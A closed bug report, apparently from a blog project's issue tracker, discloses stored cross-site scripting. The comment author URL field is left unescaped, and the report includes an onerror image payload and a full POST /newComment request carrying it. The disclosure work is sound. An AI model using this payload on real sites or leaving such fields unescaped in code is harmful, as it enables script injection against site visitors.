Closed
Description
我确定我已经查看了 (标注[ ]为[x])
我要申请 (标注[ ]为[x])
- BUG 反馈
- 添加新的特性或者功能
- 请求技术支持
Bug Report
I find that You have do HtmlUtil.escape for CommentContent

but do nothing with CommentAuthorUrl

payload:commentAuthorUrl="><img src=1 onerror=alert(123)>

POST /newComment HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 306
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.0.0.2
postId=3&commentContent=sasas&commentAuthor=as12%22%3E%3Ca%3E3&commentAuthorEmail=&commentAuthorUrl=%22%3E%3Cimg+src%3D1+onerror%3Dalert(123)%3E233&commentAgent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F73.0.3683.47+Safari%2F537.36&commentParent=28